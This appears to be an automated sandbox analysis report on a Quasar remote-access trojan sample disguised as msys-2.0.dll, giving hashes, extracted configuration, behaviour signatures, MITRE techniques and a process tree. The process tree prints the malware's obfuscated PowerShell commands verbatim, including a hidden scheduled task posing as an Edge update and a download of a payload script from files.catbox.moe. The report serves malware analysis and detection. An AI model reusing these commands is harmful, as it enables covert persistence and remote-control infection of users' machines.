quasar | bfa990bda3eebc658bcd0014dbfc9d57277e585548031f7ce4ecfcc8223f7b6b

Analysis

max time kernel
147s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20250410-en
resource tags

arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
submitted
19/04/2025, 15:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

msys-2.0.dll
Size

88KB
MD5

f947218a2b6bc294c22175030824c12b
SHA1

ba97c647a21d78f4d70135231574a9162998a3bf
SHA256

940d104b54c78abc2ab4af8d88c0da0083dda6ddf63e92976d96fadcf46d35c4
SHA512

46cb9b32a5bc07fb55fded5e42bbc8362ba0106d19c4441a639a821cd612867f676017d525d167384c9595b506db2d7a6f2ac8fa2d2c7fe102ede7b6132cd6e5
SSDEEP

1536:gsssTDMfCgjgibbqJ7tJ2Lr/lWzv0EH80OrxECICtf1eL5eim:hsOo6yOJRJ2X/czv0EH80OrxE9Ctf1eC

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

��:a>՘�后��s��6�F�l濺�,@ 3&�

Attributes

encryption_key
0A2600918F5E13281DD3F3E3CF35CA2FEACB6884
reconnect_delay
3000
startup_key
�� D��s�+��\� r8t$�

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral3/memory/2536-57-0x0000022D18640000-0x0000022D187CE000-memory.dmp	family_quasar

Blocklisted process makes network request 31 IoCs

flow	pid	Process
15	4216	powershell.exe
64	2536	powershell.exe
65	2536	powershell.exe
66	2536	powershell.exe
67	2536	powershell.exe
68	2536	powershell.exe
69	2536	powershell.exe
70	2536	powershell.exe
71	2536	powershell.exe
72	2536	powershell.exe
78	2536	powershell.exe
80	2536	powershell.exe
81	2536	powershell.exe
82	2536	powershell.exe
83	2536	powershell.exe
87	2536	powershell.exe
88	2536	powershell.exe
89	2536	powershell.exe
90	2536	powershell.exe
91	2536	powershell.exe
92	2536	powershell.exe
93	2536	powershell.exe
94	2536	powershell.exe
95	2536	powershell.exe
96	2536	powershell.exe
97	2536	powershell.exe
98	2536	powershell.exe
99	2536	powershell.exe
100	2536	powershell.exe
101	2536	powershell.exe
102	2536	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2472	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2536	powershell.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2472	powershell.exe
2472	powershell.exe
4216	powershell.exe
4216	powershell.exe
2536	powershell.exe
2536	powershell.exe
2536	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	5540	rundll32.exe
Token: SeBackupPrivilege	5540	rundll32.exe
Token: SeDebugPrivilege	5540	rundll32.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeIncreaseQuotaPrivilege	2472	powershell.exe
Token: SeSecurityPrivilege	2472	powershell.exe
Token: SeTakeOwnershipPrivilege	2472	powershell.exe
Token: SeLoadDriverPrivilege	2472	powershell.exe
Token: SeSystemProfilePrivilege	2472	powershell.exe
Token: SeSystemtimePrivilege	2472	powershell.exe
Token: SeProfSingleProcessPrivilege	2472	powershell.exe
Token: SeIncBasePriorityPrivilege	2472	powershell.exe
Token: SeCreatePagefilePrivilege	2472	powershell.exe
Token: SeBackupPrivilege	2472	powershell.exe
Token: SeRestorePrivilege	2472	powershell.exe
Token: SeShutdownPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeSystemEnvironmentPrivilege	2472	powershell.exe
Token: SeRemoteShutdownPrivilege	2472	powershell.exe
Token: SeUndockPrivilege	2472	powershell.exe
Token: SeManageVolumePrivilege	2472	powershell.exe
Token: 33	2472	powershell.exe
Token: 34	2472	powershell.exe
Token: 35	2472	powershell.exe
Token: 36	2472	powershell.exe
Token: SeIncreaseQuotaPrivilege	2472	powershell.exe
Token: SeSecurityPrivilege	2472	powershell.exe
Token: SeTakeOwnershipPrivilege	2472	powershell.exe
Token: SeLoadDriverPrivilege	2472	powershell.exe
Token: SeSystemProfilePrivilege	2472	powershell.exe
Token: SeSystemtimePrivilege	2472	powershell.exe
Token: SeProfSingleProcessPrivilege	2472	powershell.exe
Token: SeIncBasePriorityPrivilege	2472	powershell.exe
Token: SeCreatePagefilePrivilege	2472	powershell.exe
Token: SeBackupPrivilege	2472	powershell.exe
Token: SeRestorePrivilege	2472	powershell.exe
Token: SeShutdownPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeSystemEnvironmentPrivilege	2472	powershell.exe
Token: SeRemoteShutdownPrivilege	2472	powershell.exe
Token: SeUndockPrivilege	2472	powershell.exe
Token: SeManageVolumePrivilege	2472	powershell.exe
Token: 33	2472	powershell.exe
Token: 34	2472	powershell.exe
Token: 35	2472	powershell.exe
Token: 36	2472	powershell.exe
Token: SeIncreaseQuotaPrivilege	2472	powershell.exe
Token: SeSecurityPrivilege	2472	powershell.exe
Token: SeTakeOwnershipPrivilege	2472	powershell.exe
Token: SeLoadDriverPrivilege	2472	powershell.exe
Token: SeSystemProfilePrivilege	2472	powershell.exe
Token: SeSystemtimePrivilege	2472	powershell.exe
Token: SeProfSingleProcessPrivilege	2472	powershell.exe
Token: SeIncBasePriorityPrivilege	2472	powershell.exe
Token: SeCreatePagefilePrivilege	2472	powershell.exe
Token: SeBackupPrivilege	2472	powershell.exe
Token: SeRestorePrivilege	2472	powershell.exe
Token: SeShutdownPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeSystemEnvironmentPrivilege	2472	powershell.exe
Token: SeRemoteShutdownPrivilege	2472	powershell.exe
Token: SeUndockPrivilege	2472	powershell.exe
Token: SeManageVolumePrivilege	2472	powershell.exe
Token: 33	2472	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2536	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 5540 wrote to memory of 1548	5540	rundll32.exe	86
PID 5540 wrote to memory of 1548	5540	rundll32.exe	86
PID 1548 wrote to memory of 4680	1548	cmd.exe	89
PID 1548 wrote to memory of 4680	1548	cmd.exe	89
PID 4680 wrote to memory of 2236	4680	winAPI.dll	90
PID 4680 wrote to memory of 2236	4680	winAPI.dll	90
PID 2236 wrote to memory of 5188	2236	cmd.exe	91
PID 2236 wrote to memory of 5188	2236	cmd.exe	91
PID 5188 wrote to memory of 5576	5188	cmd.exe	92
PID 5188 wrote to memory of 5576	5188	cmd.exe	92
PID 5188 wrote to memory of 2472	5188	cmd.exe	94
PID 5188 wrote to memory of 2472	5188	cmd.exe	94
PID 5188 wrote to memory of 4216	5188	cmd.exe	96
PID 5188 wrote to memory of 4216	5188	cmd.exe	96
PID 5188 wrote to memory of 2536	5188	cmd.exe	108
PID 5188 wrote to memory of 2536	5188	cmd.exe	108
PID 2536 wrote to memory of 1064	2536	powershell.exe	118
PID 2536 wrote to memory of 1064	2536	powershell.exe	118
PID 1064 wrote to memory of 4956	1064	csc.exe	119
PID 1064 wrote to memory of 4956	1064	csc.exe	119

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5576	attrib.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msys-2.0.dll,#1
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c winAPI.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1548
- - C:\Users\Admin\AppData\Local\Temp\winAPI.dll
    winAPI.dll
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2236
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5188
      - C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache"
        6⤵
        Views/modifies file attributes
        
        PID:5576
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Execu"t"ionPolic"y" Byp"a"ss -Windo"w"Style Hid"d"en -Com"m"and "$action = New-ScheduledT"a"skAction -Execute 'powershell.exe' -Argument '-NoProfile -Exe"c"utionPo"l"icy B"y"pass -Wind"o"wStyle Hidden -File \"C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1\"'; $trigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME; $settings = New-ScheduledTaskSettingsSet -Hidden -DontStopIfGoingOnBatteries; $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; Register-ScheduledTask -TaskName 'Micro"s"oftEdge"U"pdat"e"Task' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force | Out-Null"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2472
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Exe"c"utionPol"i"cy By"p"ass -Win"d"owStyle H"i"dd"e"n -Co"m"mand "Invo"k"e-W"e"bRequ"e"st 'ht"t"ps://"f"iles."c"atbo"x".moe/92nbzf.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1' -Use"B"asicParsing"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:4216
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -N"o"Profi"l"e -Execu"t"ionPol"i"cy Bypa"s"s -WindowSt"y"le Hi"d"den -Fi"l"e "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2536
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f1uftubo\f1uftubo.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1064
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB63B.tmp" "c:\Users\Admin\AppData\Local\Temp\f1uftubo\CSC5C3B59CA8A1F4411994036C1BF997EE0.TMP"
        8⤵
        
        PID:4956

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
67ae1fc279e82fbccab2fa1e901c2531

SHA1
d2c4a569a138daa649bb3e27a0e19eac40862197

SHA256
9cbc6d988120283d45122cee3c18741d6f278314f5ccdde221b62acfdabaa6f7

SHA512
96118b622c988253d3e3ed4c24b516df1efd9eb5de84f7c2b9e9ff031b20a103f6f28e5aef9efd180597deeccb82416b08459202cda1ca492db5a56b146669fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0bc1ff43fa4a80c70df92ff8d8694a19

SHA1
c909b141756cc893be704ddb5ccb9c5c7ca569f4

SHA256
22decdec423f123c70d6cfdfb0eebedd45dc9c64687048b25cf8fbad2e0c2782

SHA512
476c9b47263b3703ae55b03b835059c8c438cb76cc73915436d9e0390909a74fe80a205907d3697b775eff4ba5d77ca5464574a81916af9a701b2534ff37ddc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
1KB

MD5
56ed4e1fbde1df51fb37b6677265ec3d

SHA1
6dc4cf3ebe6c0043c6fca9b5c9c46a3f5a492d17

SHA256
d65e44cd5593e4f8d380c23516e94db3b18e9a5c42ef40697beb2a611aaa9204

SHA512
c9c037b3713d2774301a4d68beee7c528fd2ade5aac95f06c82b1ef9f23ba47ec316cfc0d711fd773c8c81fd33366537395daee361325c5465cf02eb6dae41c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB63B.tmp

Filesize
1KB

MD5
9f0d749f0bed8e5b7899e6aa1a61fc96

SHA1
802ff47b208a46d576576834a85c09d9f572c8ee

SHA256
7b9dbfff4695cf441bf867072b6c9b1d8bc2583aba292666971ed3734c4e1987

SHA512
2e10d1a36e8065c1c89c786d47dc7d3f476a166b6f5e0e13b3c887d9605222e561db58089cf0bc95b7535b43bc579c87314631f247188bd872e2c94fd233d0ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c30kqv1r.zdr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\f1uftubo\f1uftubo.dll

Filesize
3KB

MD5
50b2fd0861495821d0e8330ff91ab642

SHA1
8f68c1ea010c2855c1c90454309ed429b2324823

SHA256
49df18efa354d27609d0d90390757f67bebeadab1c4978e60637e56e3f6dc700

SHA512
8c1c679a1316f5572064f0d61d064f0cd4daaba3960cc4b80f7c9883551b0002e72afe557708ee41e726827e70a32dcdba94172c1de5dc9dd936260ba6a9bac7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\UDCache\task.ps1

Filesize
7.0MB

MD5
f46cd513598c2b1ffb63fe501301dd64

SHA1
d1d71cfdc9ea551470478b2452d0e451b8d055e8

SHA256
e8d38cba909fb2374dc0a406fcc0c4360ffb12ba5d588856690e7e06657e6df5

SHA512
bbd43f0f9b7eddc0857ac14339859e0e6b756de8749e54795d86bcdb580d6bf369a5a4050231bf1bdb361ff817907175180f04f352df2e35fce63fbeb4f91974

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f1uftubo\CSC5C3B59CA8A1F4411994036C1BF997EE0.TMP

Filesize
652B

MD5
9db3b16323911ede512bbb10632bad7c

SHA1
cb2375b949c6d9e147f5afee700725968b5c4728

SHA256
6ba8548aab47315d083086c088d0a6c8e4b7bf518875294fe7db2e440a2f38b0

SHA512
2ca0c93e079dbfeef7ef7fc2796c17eca076f4c53fc68ef8e0275eaa2b2c237d7aa7f36c83fbff966c12d3371c3a3ddbe6d20bd98a8d25941e16f2dcabe90d85

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f1uftubo\f1uftubo.0.cs

Filesize
938B

MD5
5b328f64341f326554c2d3c08ace5f93

SHA1
25a9aad6022782e5200d410aa9ff8e707ee2eb1a

SHA256
6e7a0c2174ae7882e6bd3f4afdf0438b982649021048df980b08c5ac948a01b9

SHA512
d4116697a54bc21a8d77aaa8eeafa95d60b6873073f2294d027829a83dc82bf39d63f08464b7622dcfd4ec3a1991b6225f72399321a5f93582d84387088badd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f1uftubo\f1uftubo.cmdline

Filesize
369B

MD5
7eaa93f2b64e3e7161dc01be63c1d532

SHA1
4d0e887eb9c084c482a0d47e6cc0d3dd1910b4e1

SHA256
377a5d38f50581748e263fc5db737f6a832792f91dfc48393e1cc97a2ce66371

SHA512
8b37f5099bfc43ddcaa0070c4f3f9c030f200887adbf303325a230610ff1cb5599f5b835adb60b67467b1193ec6d10d038b405b24d0509f965fa56f3d9257be4

Download Submit
memory/2472-14-0x000001E6F4D30000-0x000001E6F4D52000-memory.dmp

Filesize
136KB

Download
memory/2536-57-0x0000022D18640000-0x0000022D187CE000-memory.dmp

Filesize
1.6MB

Download
memory/2536-53-0x0000022D18000000-0x0000022D18008000-memory.dmp

Filesize
32KB

Download
memory/2536-55-0x0000022D18020000-0x0000022D1818A000-memory.dmp

Filesize
1.4MB

Download
memory/2536-58-0x0000022D184B0000-0x0000022D184CA000-memory.dmp

Filesize
104KB

Download
memory/2536-59-0x0000022D18C30000-0x0000022D18C42000-memory.dmp

Filesize
72KB

Download
memory/2536-60-0x0000022D18C40000-0x0000022D18C7A000-memory.dmp

Filesize
232KB

Download
memory/2536-61-0x0000022D5F0C0000-0x0000022D5F110000-memory.dmp

Filesize
320KB

Download
memory/2536-62-0x0000022D5F1D0000-0x0000022D5F282000-memory.dmp

Filesize
712KB

Download
memory/2536-63-0x0000022D18C80000-0x0000022D18CCE000-memory.dmp

Filesize
312KB

Download
memory/2536-64-0x0000022D18CD0000-0x0000022D18D1C000-memory.dmp

Filesize
304KB

Download
memory/2536-66-0x0000022D18D70000-0x0000022D18D9A000-memory.dmp

Filesize
168KB

Download
memory/2536-65-0x0000022D18D20000-0x0000022D18D6A000-memory.dmp

Filesize
296KB

Download
memory/5540-0-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download